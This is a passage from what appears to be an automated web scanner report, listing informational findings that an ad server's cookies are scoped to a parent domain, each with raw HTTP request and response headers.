Date: Wed, 07 Sep 2011 14:19:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4e8588ddc30f9fd9f878d610^&12590^65&12338^53; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63604; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3165015.js^2^1315405194^1315405195&3151969.js^11^1315405176^1315405190&3150144.js^1^1315405186^1315405186&3178849.js^1^1315405181^1315405181&3151650.js^2^1315405172^1315405175&3196947.js^2^1315405168^1315405171&3188306.js^1^1315405169^1315405169&3186719.js^1^1315405168^1315405168&3212309.js^1^1315405167^1315405167&3199969.js^1^1315405166^1315405166; expires=Wed, 14-Sep-2011 14:19:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1654

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.28. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.520786275388673&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^11&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^18&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:30:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^76&12590^78; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62996; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2908

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.29. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.html?cb=0.3859964762814343&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^11&12590^9; rdk=7725/12338; rdk2=0; ses2=12338^19&12590^7; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:51 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^15&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62888; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3151964.js^2^1315405891^1315405911&3152310.js^3^1315405830^1315405906&3151648.js^2^1315405815^1315405861&3196945.js^2^1315405767^1315405804&3165011.js^3^1315405775^1315405790&3199967.js^1^1315405763^1315405763; expires=Wed, 14-Sep-2011 14:31:51 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2269

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.30. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; ses15=12338^3&12590^2; csi15=3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:31 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^5&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196947.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1858

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.31. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.html?cb=0.6520654342602938&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^7; rdk=7725/12338; ses2=12338^14&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^84; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63532; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2928

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.32. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.html?cb=0.6706412732601166&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^18&12590^6; rdk=7856/12590; ses15=12338^11&12590^9

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:30:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^1&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62962; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.33. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^119&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3151648.js^1^1315404888^1315404888&3152310.js^1^1315404888^1315404888&3165011.js^3^1315404888^1315404888&3196945.js^1^1315404887^1315404887&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^268308726; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1733

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151648"
...[SNIP]...

8.34. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D31733135.js&size_id=15&account_id=7856&site_id=12590&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=0; ses15=12338^3&12590^3; csi15=3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:31 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=1; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=10; path=/; domain=.rubiconproject.com
